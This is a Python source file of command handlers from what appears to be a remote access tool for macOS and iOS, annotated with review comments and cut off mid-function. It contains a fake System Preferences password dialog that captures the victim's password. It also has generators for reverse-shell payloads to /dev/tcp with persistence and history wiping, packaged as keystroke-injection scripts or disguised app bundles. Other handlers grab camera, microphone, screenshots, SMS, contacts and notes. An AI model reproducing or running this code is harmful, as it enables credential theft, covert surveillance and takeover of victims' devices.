def run(self,session,cmd_data):
    """Show a password dialog on the remote macOS host and print the answer.

    Sends an AppleScript to the session that has Finder display a
    hidden-answer dialog worded as a System Preferences request, repeating
    until a non-empty answer is entered, and then echoes that answer back over
    the session. The operator console prints it; the method returns "".

    Review note: the dialog is raised by Finder, carries the FileVaultIcon.icns
    resource from CoreTypes.bundle and has no link to a real authorization
    request, which is what distinguishes it from a genuine system prompt.
    """
    # AppleScript source kept exactly as it appears on the page; the line
    # breaks of the original literal were lost in extraction.
    payload = """ tell application "Finder" activate set myprompt to "Type your password to allow System Preferences to make changes" set ans to "Cancel" repeat try set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle" set ans to button returned of d_returns set mypass to text returned of d_returns if mypass > "" then exit repeat end try end repeat try do shell script "echo " & quoted form of mypass end try end tell """
    # Reuse the incoming command dict, replacing its command and arguments.
    cmd_data.update({"cmd":"applescript","args":payload})
    password = session.send_command(cmd_data).strip()
    # The reply is decoded before printing, so send_command is presumably
    # returning bytes here - confirm against the session implementation.
    h.info_success("Response: "+password.decode())
    return ""
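def run(self, session, cmd_data):
    """Request a front or back camera picture from the session and save it.

    ``cmd_data['args']`` must be "front" or "back"; anything else prints the
    usage text. The argument is replaced by a boolean (True for front, False
    for back) before the command is sent. The reply is JSON: when it contains
    ``success`` it also carries ``size``, and that many bytes are read from the
    session socket and written to ``downloads/<side>_<epoch>.jpg``.
    """
    side = cmd_data['args']
    if side not in ("front", "back"):
        print(self.usage)
        return

    use_front = side != "back"
    cmd_data['args'] = use_front
    h.info_general("Taking picture...")
    try:
        response = json.loads(session.send_command(cmd_data))
        if 'success' in response:
            # The byte count is whatever the remote end reports; int() at
            # least rejects a non-numeric value before the socket read.
            size = int(response["size"])
            prefix = "front" if use_front else "back"
            file_name = "{0}_{1}.jpg".format(prefix, int(time.time()))
            data = session.sock_receive_data(size)
            h.info_general("Saving {0}".format(file_name))
            # Image bytes need binary mode, and the with-block closes the
            # handle even when the write raises.
            with open(os.path.join('downloads', file_name), 'wb') as f:
                f.write(data)
            h.info_success("Saved to downloads/{0}!".format(file_name))
        elif 'error' in response:
            h.info_error(response['error'])
        else:
            h.info_error("Unexpected error!")
    except Exception as e:
        # Best-effort handler kept from the original: report and carry on.
        print(e)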
def run(self, session, cmd_data):
    """Upload a local file through the session.

    ``cmd_data['args']`` holds one or two paths separated by a space; a space
    preceded by a backslash does not split. With one path the remote directory
    is "." and the remote name is the local file name. With two, an empty
    directory or file component of the second path falls back to "." and the
    local file name respectively.
    """
    raw_args = cmd_data['args']
    if not raw_args:
        print(self.usage)
        return

    # Negative look-behind keeps backslash-escaped spaces inside one path.
    parts = re.split(r'(?<!\\) ', raw_args.rstrip())
    if len(parts) > 2:
        print("Usage: upload <local_file> <remote_dir>")
        return

    local_path = parts[0]
    local_file = os.path.split(local_path)[1]
    if len(parts) == 2:
        head, tail = os.path.split(parts[1])
        remote_dir = head if head else "."
        remote_file = tail if tail else local_file
    else:
        remote_dir, remote_file = ".", local_file

    session.upload_file(local_path, remote_dir, remote_file)
    h.info_success("File successfully uploaded!")
def run(self,server):
    """Prompt for options and write a keystroke-injection script to disk.

    Asks for a shell name, whether the command should loop, and an output
    path (default "payload.txt"). The written text is a sequence of
    DELAY/COMMAND/STRING/ENTER directives that opens "terminal" and types a
    command redirecting the chosen shell to /dev/tcp/<server.host>/<server.port>,
    followed by "history -wc;killall Terminal".

    Review note: the typed command is fully visible in the generated file, so
    the /dev/tcp redirect and the history/Terminal clean-up are the strings to
    look for when triaging a recovered script.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
        # Re-prompt until a non-empty shell name is given.
        while shell == "":
            shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
        persistence = raw_input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
            break
    shell_command += "history -wc;killall Terminal"
    path = raw_input(h.info_general_raw("Output path: ")).strip(" ")
    if path == "":
        path = "payload.txt"
    if os.path.isdir(path):
        # isdir() already implies the path exists, so the else branch below
        # is not expected to run.
        if os.path.exists(path):
            if path[-1:] == "/":
                payload_save_path = path + "payload.txt"
            else:
                payload_save_path = path + "/payload.txt"
        else:
            h.info_error("Local directory: "+path+": does not exist!")
            # NOTE(review): bare `exit` is an expression, not a call; nothing
            # stops here and payload_save_path is left unbound.
            exit
    else:
        direct = os.path.split(path)[0]
        # A bare file name has no directory part; check the current directory.
        if direct == "":
            direct = "."
        else:
            pass
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path
            else:
                h.info_error("Error: "+direct+": not a directory!")
                # NOTE(review): same no-op `exit` as above.
                exit
        else:
            h.info_error("Local directory: "+direct+": does not exist!")
            # NOTE(review): same no-op `exit` as above.
            exit
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction.
    payload = """\ DELAY 500 COMMAND SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING """+shell_command+""" DELAY 500 ENTER DELAY 500"""
    h.info_general("Saving to " + payload_save_path + "...")
    # NOTE(review): the handle is not closed if write() raises.
    f = open(payload_save_path,"w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + payload_save_path + "!")
def run(self, server):
    """Prompt for options and assemble an application bundle around a script.

    Asks for a shell name, an icon file, whether the command should loop, and
    an output path. Copies data/app/payload.app to the output path, moves the
    icon into Contents/Resources/payload.icns, writes a bash script holding a
    command that redirects the chosen shell to
    /dev/tcp/<server.host>/<server.port>, and marks
    Contents/MacOS/payload.sh executable.

    Review note: the bundle's only executable is a plain-text bash script, so
    inspecting Contents/MacOS/payload.sh shows the full command.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
        icon = raw_input(h.info_general_raw("Application Icon: ")).strip(" ")
        persistence = raw_input(h.info_question_raw("Make Persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1;"
            break
    path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
    # Work relative to the directory recorded in OLDPWD; raises KeyError when
    # that variable is not set.
    w = os.environ['OLDPWD']
    os.chdir(w)
    if os.path.isdir(path):
        if os.path.exists(path):
            # NOTE(review): path[:-1] is the path minus its last character,
            # so this is not a trailing-slash test; other generators on this
            # page compare path[-1] instead.
            if path[:-1] == "/":
                payload_save_path = path + "payload.app"
            else:
                payload_save_path = path + "/payload.app"
        else:
            h.info_error("Local directory: " + path + ": does not exist!")
            # NOTE(review): bare `exit` is an expression, not a call; nothing
            # stops here and payload_save_path is left unbound.
            exit
    else:
        direct = os.path.split(path)[0]
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path + "/Contents/MacOS/payload.sh"
            else:
                h.info_error("Error: " + direct + ": not a directory!")
                # NOTE(review): same no-op `exit` as above.
                exit
        else:
            h.info_error("Local directory: " + direct + ": does not exist!")
            # NOTE(review): same no-op `exit` as above.
            exit
    # NOTE(review): path and icon are typed at the prompt and concatenated
    # unquoted into shell command lines; spaces or shell metacharacters in
    # either are interpreted by the local shell.
    os.system("cp -r data/app/payload.app " + path + " > /dev/null")
    os.system("mv " + icon + " " + path + "/Contents/Resources/payload.icns > /dev/null")
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction.
    payload = """\ #! /usr/bin/env bash """ + shell_command
    h.info_general("Saving to " + path + "...")
    # NOTE(review): the handle is not closed if write() raises.
    f = open(payload_save_path, "w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + path + "!")
    os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
    # Return to the tool's own directory under HOME.
    g = os.environ['HOME']
    os.chdir(g + "/mouse")
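def run(self, session, cmd_data):
    """Download the SMS database from the session and save it locally.

    Fetches ``/var/mobile/Library/SMS/sms.db`` through the session and, when
    data comes back, writes it to ``downloads/sms.db``. Nothing is written
    when the download returns no data.
    """
    file_name = "sms.db"
    h.info_general("Downloading {0}".format(file_name))
    data = session.download_file('/var/mobile/Library/SMS/' + file_name)
    if not data:
        return

    h.info_general("Saving {0}".format(file_name))
    # A database file is binary; text mode would corrupt or reject it. The
    # with-block also closes the handle when the write raises.
    with open(os.path.join('downloads', file_name), 'wb') as f:
        f.write(data)
    h.info_success("Saved to downloads/{0}!".format(file_name))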
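def run(self, session, cmd_data):
    """Download one remote file through the session into ``downloads/``.

    ``cmd_data['args']`` is the remote path. The local name is the last path
    component, so the file always lands directly inside ``downloads/``. The
    usage text is printed when the argument is empty or has no file component
    (for example a path ending in "/").
    """
    remote_path = cmd_data['args']
    if not remote_path:
        print(self.usage)
        return

    file_name = os.path.split(remote_path)[-1]
    if not file_name:
        # Without a file component the target would be the downloads
        # directory itself, which cannot be opened for writing.
        print(self.usage)
        return

    h.info_general("Downloading {0}...".format(file_name))
    data = session.download_file(remote_path)
    if not data:
        return

    h.info_general("Saving {0}...".format(file_name))
    # Content is arbitrary remote data: write it as bytes, and let the
    # with-block close the handle even when the write raises.
    with open(os.path.join('downloads', file_name), 'wb') as f:
        f.write(data)
    h.info_success("File saved to downloads/{0}!".format(file_name))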
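def run(self, session, cmd_data):
    """Request a screenshot from the session and save it under ``downloads/``.

    The reply is JSON. An ``error`` key is reported and ends the call; a
    ``size`` key gives the number of bytes to read from the session socket,
    which are written to ``downloads/screenshot_<epoch>.jpg``. A reply with
    neither key does nothing.
    """
    h.info_general("Taking screenshot...")
    result = json.loads(session.send_command(cmd_data))
    if 'error' in result:
        h.info_error(result['error'])
        return
    if 'size' not in result:
        return

    # The byte count is whatever the remote end reports.
    size = int(result['size'])
    data = session.sock_receive_data(size)
    file_name = "screenshot_{0}.jpg".format(int(time.time()))
    h.info_general("Saving {0}".format(file_name))
    # Image bytes need binary mode; the with-block closes the handle even
    # when the write raises.
    with open(os.path.join('downloads', file_name), 'wb') as f:
        f.write(data)
    h.info_success("Saved to downloads/{0}!".format(file_name))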
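def run(self, session, cmd_data):
    """Request a camera picture from the session and save it under ``downloads/``.

    The reply is JSON. When ``status`` equals 1 the reply's ``size`` gives the
    number of bytes to read from the session socket, which are written to
    ``downloads/isight_<epoch>.jpg``. Any error while handling the reply is
    printed rather than raised.
    """
    h.info_general("Taking picture...")
    response = json.loads(session.send_command(cmd_data))
    try:
        if response["status"] == 1:
            # The byte count is whatever the remote end reports.
            size = int(response["size"])
            file_name = "isight_{0}.jpg".format(int(time.time()))
            data = session.sock_receive_data(size)
            h.info_general("Saving {0}".format(file_name))
            # Image bytes need binary mode; the with-block closes the handle
            # even when the write raises.
            with open(os.path.join('downloads', file_name), 'wb') as f:
                f.write(data)
            h.info_success("Saved to downloads/{0}!".format(file_name))
    except Exception as e:
        # Best-effort handler kept from the original: report and carry on.
        print(e)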
def run(self,session,cmd_data):
    """Download a remote file through the session to a chosen local path.

    ``cmd_data['args']`` holds "<remote_path> <local_path>" split on
    whitespace. The remote path is first checked with two commands (a
    directory test and ``stat``); the local path may be an existing directory
    or a file path whose parent directory exists.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from the order of the if/else keywords.
    """
    if len(cmd_data['args'].split()) < 2:
        print self.usage
        return
    # Work relative to the directory recorded in OLDPWD; raises KeyError when
    # that variable is not set.
    w = os.environ['OLDPWD']
    os.chdir(w)
    # Shell snippet kept exactly as it appears on the page (its line breaks
    # were lost). NOTE(review): the remote path is inserted unquoted.
    payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]] then echo 0 fi"""
    dchk = session.send_command({"cmd":"","args":payload})
    chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]})
    # A reply starting with "stat" is treated as "remote path not found".
    if chk[:4] != "stat":
        # "0\n" from the snippet means the remote path is a directory.
        if dchk == "0\n":
            h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!")
        else:
            if os.path.isdir(cmd_data['args'].split()[1]):
                # isdir() already implies existence, so the else branch of
                # this test is not expected to run.
                if os.path.exists(cmd_data['args'].split()[1]):
                    rp = os.path.split(cmd_data['args'].split()[0])[1]
                    data = session.download_file(cmd_data['args'].split()[0])
                    h.info_general("Downloading {0}...".format(rp))
                    if data:
                        # NOTE(review): this message prints the whole argument
                        # string, not just the local directory.
                        h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp))
                        # NOTE(review): text mode and no close on error; other
                        # handlers on this page write downloads with 'wb'.
                        f = open(os.path.join(cmd_data['args'].split()[1],rp),'w')
                        f.write(data)
                        f.close()
                        if cmd_data['args'].split()[1][-1:] == "/":
                            h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!")
                        else:
                            h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!")
                else:
                    h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!")
            else:
                rp = os.path.split(cmd_data['args'].split()[1])[0]
                # A bare file name has no directory part; check the current
                # directory instead.
                if rp == "":
                    rp = "."
                else:
                    pass
                if os.path.exists(rp):
                    if os.path.isdir(rp):
                        # prr/rp: directory and file name of the local target;
                        # pr: file name of the remote source.
                        prr = os.path.split(cmd_data['args'].split()[1])[0]
                        rp = os.path.split(cmd_data['args'].split()[1])[1]
                        pr = os.path.split(cmd_data['args'].split()[0])[1]
                        data = session.download_file(cmd_data['args'].split()[0])
                        h.info_general("Downloading {0}...".format(pr))
                        if data:
                            h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1]))
                            f = open(os.path.join(prr,rp),'w')
                            f.write(data)
                            f.close()
                            h.info_success("Saved to "+cmd_data['args'].split()[1]+"!")
                    else:
                        h.info_error("Error: "+rp+": not a directory!")
                else:
                    h.info_error("Local directory: "+rp+": does not exists!")
    else:
        h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!")
    # Return to the tool's own directory under HOME.
    g = os.environ['HOME']
    os.chdir(g + "/mouse")
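def run(self, session, cmd_data):
    """Start or stop a microphone recording on the session.

    ``cmd_data["args"]`` is "start" or "stop". "start" forwards the command
    and prints the reply. "stop" expects a JSON reply: an ``error`` key is
    reported; ``status`` equal to 1 triggers a download of ``/tmp/.avatmp``
    from the remote host, saved as ``downloads/mic<epoch>.caf``. Any other
    argument prints the usage line.
    """
    action = cmd_data["args"]
    if action == "start":
        h.info_general(session.send_command(cmd_data))
        return
    if action != "stop":
        print("Usage: mic [start|stop]")
        return

    result = json.loads(session.send_command(cmd_data))
    if 'error' in result:
        h.info_error("Error: " + result['error'])
    elif 'status' in result and result['status'] == 1:
        data = session.download_file("/tmp/.avatmp")
        if not data:
            # Without this guard an empty download reached write() and failed
            # there, leaving an empty file behind.
            h.info_error("Failed to download recording!")
            return
        file_name = "mic{0}.caf".format(int(time.time()))
        h.info_general("Saving {0}".format(file_name))
        # Audio bytes need binary mode; the with-block closes the handle even
        # when the write raises.
        with open(os.path.join('downloads', file_name), 'wb') as f:
            f.write(data)
        h.info_success("Saved to downloads/{0}!".format(file_name))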
def run(self, session, cmd_data):
    """Download the notes database through the session to a local path.

    The first word of ``cmd_data['args']`` is the destination: an existing
    directory (the file is then named ``notes.sqlite``) or a file path whose
    parent directory exists. The working directory is switched to ``OLDPWD``
    for the duration and to ``$HOME/mouse`` afterwards.
    """
    words = cmd_data['args'].split()
    if len(words) < 1:
        print(self.usage)
        return

    os.chdir(os.environ['OLDPWD'])
    dest = words[0]
    remote_db = '/var/mobile/Library/Notes/notes.sqlite'

    if not os.path.isdir(dest):
        # Destination names a file: validate its parent directory first.
        parent, leaf = os.path.split(dest)
        check_dir = "." if parent == "" else parent
        if not os.path.exists(check_dir):
            h.info_error("Local directory: " + check_dir + ": does not exist!")
        elif not os.path.isdir(check_dir):
            h.info_error("Error: " + check_dir + ": not a directory!")
        else:
            h.info_general("Getting notes...")
            blob = session.download_file(remote_db)
            if not blob:
                h.info_error("Failed to get notes!")
            else:
                out = open(os.path.join(parent, leaf), 'wb')
                out.write(blob)
                out.close()
                h.info_general("Saving to " + dest + "...")
                time.sleep(1)
                h.info_success("Saved to " + dest + "!")
    elif not os.path.exists(dest):
        h.info_error("Local directory: " + dest + ": does not exist!")
    else:
        # Destination is a directory: store the file under its default name.
        h.info_general("Getting notes...")
        blob = session.download_file(remote_db)
        if not blob:
            h.info_error("Failed to get notes!")
        else:
            out = open(os.path.join(dest, 'notes.sqlite'), 'wb')
            out.write(blob)
            out.close()
            # Avoid a doubled slash in the message when dest already ends in one.
            if dest[-1] == "/":
                shown = dest + "notes.sqlite"
            else:
                shown = dest + "/notes.sqlite"
            h.info_general("Saving to " + shown + "...")
            time.sleep(1)
            h.info_success("Saved to " + shown + "!")

    os.chdir(os.environ['HOME'] + "/mouse")
def run(self, session, cmd_data):
    """Download the address-book database through the session to a local path.

    The first word of ``cmd_data['args']`` is the destination: an existing
    directory (the file is then named ``contacts.sqlitedb``) or a file path
    whose parent directory exists.
    """
    words = cmd_data['args'].split()
    if len(words) < 1:
        print(self.usage)
        return

    dest = words[0]
    remote_db = '/var/mobile/Library/AddressBook/AddressBook.sqlitedb'

    if not os.path.isdir(dest):
        # Destination names a file: validate its parent directory first.
        parent, leaf = os.path.split(dest)
        check_dir = "." if parent == "" else parent
        if not os.path.exists(check_dir):
            h.info_error("Local directory: " + check_dir + ": does not exist!")
        elif not os.path.isdir(check_dir):
            h.info_error("Error: " + check_dir + ": not a directory!")
        else:
            h.info_general("Getting contacts...")
            blob = session.download_file(remote_db)
            if not blob:
                h.info_error("Failed to get contacts!")
            else:
                out = open(os.path.join(parent, leaf), 'wb')
                out.write(blob)
                out.close()
                h.info_general("Saving to " + dest + "...")
                time.sleep(1)
                h.info_success("Saved to " + dest + "!")
    elif not os.path.exists(dest):
        h.info_error("Local directory: " + dest + ": does not exist!")
    else:
        # Destination is a directory: store the file under its default name.
        h.info_general("Getting contacts...")
        blob = session.download_file(remote_db)
        if not blob:
            h.info_error("Failed to get contacts!")
        else:
            out = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb')
            out.write(blob)
            out.close()
            # Avoid a doubled slash in the message when dest already ends in one.
            if dest[-1] == "/":
                shown = dest + "contacts.sqlitedb"
            else:
                shown = dest + "/contacts.sqlitedb"
            h.info_general("Saving to " + shown + "...")
            time.sleep(1)
            h.info_success("Saved to " + shown + "!")
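def run(self, session, cmd_data):
    """Request a camera picture from the session and save it to a local path.

    The first word of ``cmd_data['args']`` is the destination: an existing
    directory (the file is then named ``picture.jpg``) or a file path whose
    parent directory exists. The reply is JSON; when ``status`` equals 1 its
    ``size`` gives the number of bytes to read from the session socket.
    Success is reported only after the file has actually been written.
    """
    tokens = cmd_data['args'].split()
    if not tokens:
        print(self.usage)
        return

    dest = tokens[0]
    if os.path.isdir(dest):
        target = os.path.join(dest, 'picture.jpg')
    else:
        # A bare file name has an empty directory part; treat it as the
        # current directory, as the other save-to-path handlers do.
        parent = os.path.split(dest)[0] or "."
        if not os.path.exists(parent):
            h.info_error("Local directory: " + parent + ": does not exist!")
            return
        if not os.path.isdir(parent):
            h.info_error("Error: " + parent + ": not a directory!")
            return
        target = dest

    h.info_general("Taking picture...")
    try:
        response = json.loads(session.send_command(cmd_data))
        if response["status"] != 1:
            h.info_error("Failed to take picture!")
            return
        # The byte count is whatever the remote end reports.
        size = int(response["size"])
        data = session.sock_receive_data(size)
        # Image bytes need binary mode; the with-block closes the handle even
        # when the write raises.
        with open(target, 'wb') as f:
            f.write(data)
    except Exception:
        # Narrower than a bare except, so Ctrl-C still interrupts.
        h.info_error("Failed to take picture!")
        return

    h.info_general("Saving to " + target + "...")
    time.sleep(1)
    h.info_success("Saved to " + target + "!")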
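def run(self, session, cmd_data):
    """Request a screenshot from the session and save it to a local path.

    The first word of ``cmd_data['args']`` is the destination: an existing
    directory (the file is then named ``screenshot.jpg``) or a file path whose
    parent directory exists. The reply is JSON; ``size`` gives the number of
    bytes to read from the session socket. A reply with an ``error`` key, or
    without ``size``, is reported as a failure instead of a save.
    """
    tokens = cmd_data['args'].split()
    if not tokens:
        print(self.usage)
        return

    dest = tokens[0]
    if os.path.isdir(dest):
        target = os.path.join(dest, 'screenshot.jpg')
    else:
        # A bare file name has an empty directory part; check the current
        # directory in that case.
        parent = os.path.split(dest)[0] or "."
        if not os.path.exists(parent):
            h.info_error("Local directory: " + parent + ": does not exist!")
            return
        if not os.path.isdir(parent):
            h.info_error("Error: " + parent + ": not a directory!")
            return
        target = dest

    h.info_general("Taking screenshot...")
    result = json.loads(session.send_command(cmd_data))
    if 'error' in result or 'size' not in result:
        # Previously a reply with neither key still printed "Saved to ...".
        h.info_error("Failed to take screenshot!")
        return

    # The byte count is whatever the remote end reports.
    size = int(result['size'])
    data = session.sock_receive_data(size)
    # Image bytes need binary mode; the with-block closes the handle even
    # when the write raises.
    with open(target, 'wb') as f:
        f.write(data)

    h.info_general("Saving to " + target + "...")
    time.sleep(1)
    h.info_success("Saved to " + target + "!")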
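def run(self, session, cmd_data):
    """Download the notes database through the session to a local path.

    The first word of ``cmd_data['args']`` is the destination: an existing
    directory (the file is then named ``notes.sqlite``) or a file path whose
    parent directory exists. An empty download is reported as a failure and
    nothing is written.
    """
    tokens = cmd_data['args'].split()
    if not tokens:
        print(self.usage)
        return

    dest = tokens[0]
    if os.path.isdir(dest):
        target = os.path.join(dest, 'notes.sqlite')
    else:
        # A bare file name has an empty directory part; without this
        # fallback it was rejected as a missing directory.
        parent = os.path.split(dest)[0] or "."
        if not os.path.exists(parent):
            h.info_error("Local directory: " + parent + ": does not exist!")
            return
        if not os.path.isdir(parent):
            h.info_error("Error: " + parent + ": not a directory!")
            return
        target = dest

    h.info_general("Getting notes...")
    data = session.download_file('/var/mobile/Library/Notes/notes.sqlite')
    if not data:
        h.info_error("Failed to get notes!")
        return

    # A database file is binary; the with-block closes the handle even when
    # the write raises.
    with open(target, 'wb') as f:
        f.write(data)

    h.info_general("Saving to " + target + "...")
    time.sleep(1)
    h.info_success("Saved to " + target + "!")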
def run(self, session, cmd_data):
    """Start a microphone recording, or stop it and save the audio locally.

    ``cmd_data['args']`` is "start" or "stop <local_path>". "start" sends the
    command with its argument replaced by "record". "stop" sends "stop",
    expects a JSON reply, and on ``status`` 1 downloads ``/tmp/.avatmp`` from
    the remote host to the local path (``mic.caf`` inside it when the path is
    a directory).

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from the order of the if/elif/else keywords.
    """
    if not cmd_data['args']:
        print(self.usage)
        return
    else:
        if cmd_data['args'].split()[0] == "start":
            pass
        else:
            # Anything other than "start" must be "stop" plus a destination.
            if len(cmd_data['args'].split()) < 2 or cmd_data['args'].split()[0] != "stop":
                print(self.usage)
                return
    if cmd_data['args'].split()[0] == "stop":
        # Work relative to the directory recorded in OLDPWD; raises KeyError
        # when that variable is not set.
        w = os.environ['OLDPWD']
        os.chdir(w)
        dest = cmd_data['args'].split()[1]
        # Only the verb is sent to the remote side; dest stays local.
        cmd_data['args'] = "stop"
        if os.path.isdir(dest):
            # isdir() already implies existence, so the else branch of this
            # test is not expected to run.
            if os.path.exists(dest):
                h.info_general("Stopping record...")
                result = json.loads(session.send_command(cmd_data))
                if 'error' in result:
                    h.info_error("Failed to record mic!")
                    # NOTE(review): returns without the chdir back to
                    # $HOME/mouse done at the end of this branch.
                    return
                elif 'status' in result and result['status'] == 1:
                    data = session.download_file("/tmp/.avatmp")
                    # NOTE(review): data is written without checking that the
                    # download returned anything.
                    f = open(os.path.join(dest, 'mic.caf'), 'wb')
                    f.write(data)
                    f.close()
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest + "mic.caf...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "mic.caf!")
                    else:
                        h.info_general("Saving to " + dest + "/mic.caf...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "/mic.caf!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            rp = os.path.split(dest)[0]
            # A bare file name has no directory part; check the current
            # directory instead.
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    # pr/rp: directory and file name of the local target.
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Stopping record...")
                    result = json.loads(session.send_command(cmd_data))
                    if 'error' in result:
                        h.info_error("Failed to record mic!")
                        return
                    elif 'status' in result and result['status'] == 1:
                        data = session.download_file("/tmp/.avatmp")
                        f = open(os.path.join(pr, rp), 'wb')
                        f.write(data)
                        f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
        # Return to the tool's own directory under HOME.
        g = os.environ['HOME']
        os.chdir(g + "/mouse")
    elif cmd_data['args'].split()[0] == "start":
        cmd_data['args'] = "record"
        h.info_general("Starting record...")
        session.send_command(cmd_data)
def run(self, server):
    """Prompt for options and assemble an application bundle around a script.

    Asks for a shell name and an icon file (both re-prompted until non-empty),
    whether the command should loop, and an output path (default
    "payload.app"). Copies data/app/payload.app to the output path, moves the
    icon into Contents/Resources/payload.icns, writes a bash script holding a
    command that redirects the chosen shell to
    /dev/tcp/<server.host>/<server.port> followed by
    "history -wc;killall Terminal", and marks Contents/MacOS/payload.sh
    executable.

    Review note: the script is plain text, so the /dev/tcp redirect and the
    history/Terminal clean-up are directly visible in a recovered bundle.
    """
    # Every path through the body ends in break, so this loop runs once.
    while 1:
        shell = input(h.info_general_raw("Target shell: ")).strip(" ")
        while shell == "":
            shell = input(h.info_general_raw("Target shell: ")).strip(" ")
        icon = input(h.info_general_raw("Application icon: ")).strip(" ")
        while icon == "":
            icon = input(h.info_general_raw("Application icon: ")).strip(" ")
        persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
        if persistence == "y":
            # Looping form: retries every 5 seconds in the background.
            shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1); sleep 5; done & "
            break
        else:
            shell_command = shell + " &> /dev/tcp/" + str(server.host) + "/" + str(server.port) + " 0>&1;"
            break
    shell_command += "history -wc;killall Terminal"
    path = input(h.info_general_raw("Output path: ")).strip(" ")
    if path == "":
        path = "payload.app"
    if os.path.isdir(path):
        # isdir() already implies existence, so the else branch of this test
        # is not expected to run.
        if os.path.exists(path):
            if path[-1] == "/":
                payload_save_path = path + "payload.app"
            else:
                payload_save_path = path + "/payload.app"
        else:
            h.info_error("Local directory: " + path + ": does not exist!")
            # NOTE(review): bare `exit` is an expression, not a call; nothing
            # stops here and payload_save_path is left unbound.
            exit
    else:
        direct = os.path.split(path)[0]
        # A bare name has no directory part; check the current directory.
        if direct == "":
            direct = "."
        else:
            pass
        if os.path.exists(direct):
            if os.path.isdir(direct):
                payload_save_path = path
            else:
                h.info_error("Error: " + direct + ": not a directory!")
                # NOTE(review): same no-op `exit` as above.
                exit
        else:
            h.info_error("Local directory: " + direct + ": does not exist!")
            # NOTE(review): same no-op `exit` as above.
            exit
    h.info_general("Creating payload...")
    # NOTE(review): path and icon are typed at the prompt and concatenated
    # unquoted into shell command lines; spaces or shell metacharacters in
    # either are interpreted by the local shell.
    os.system("cp -r data/app/payload.app " + path + " > /dev/null")
    os.system("mv " + icon + " " + path + "/Contents/Resources/payload.icns > /dev/null")
    # Literal kept exactly as it appears on the page; its original line breaks
    # were lost in extraction.
    payload = """\ #! /usr/bin/env bash """ + shell_command
    h.info_general("Saving to " + path + "...")
    # NOTE(review): in the non-directory branch payload_save_path equals path,
    # which the cp above has presumably just created as a directory - confirm
    # that this open() can succeed there.
    f = open(payload_save_path, "w")
    f.write(payload)
    f.close()
    h.info_success("Saved to " + path + "!")
    os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
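def run(self,session,cmd_data):
    """Request a front or back camera picture and save it to a local path.

    ``cmd_data['args']`` is "<front|back> <local_path>". The local path may be
    an existing directory (the file is then named ``picture.jpg``) or a file
    path whose parent directory exists. Before sending, the argument is
    replaced by a boolean (True for front, False for back). The reply is
    JSON; when it contains ``success`` its ``size`` gives the number of bytes
    to read from the session socket.
    """
    tokens = cmd_data['args'].split()
    if len(tokens) < 2 or tokens[0] not in ("front", "back"):
        print(self.usage)
        return

    side, dest = tokens[0], tokens[1]
    cmd_data['args'] = side

    # Resolve the local target once instead of repeating the capture code in
    # a directory branch and a file branch.
    if os.path.isdir(dest):
        target = os.path.join(dest, 'picture.jpg')
    else:
        # A bare file name has an empty directory part; check the current
        # directory in that case.
        parent = os.path.split(dest)[0] or "."
        if not os.path.exists(parent):
            h.info_error("Local directory: "+parent+": does not exist!")
            return
        if not os.path.isdir(parent):
            h.info_error("Error: "+parent+": not a directory!")
            return
        target = dest

    cmd_data['args'] = side != "back"
    h.info_general("Taking picture...")
    try:
        response = json.loads(session.send_command(cmd_data))
        if 'success' not in response:
            h.info_error("Failed to take picture!")
            return
        # The byte count is whatever the remote end reports.
        size = int(response["size"])
        data = session.sock_receive_data(size)
        # The with-block closes the handle even when the write raises.
        with open(target,'wb') as f:
            f.write(data)
    except Exception:
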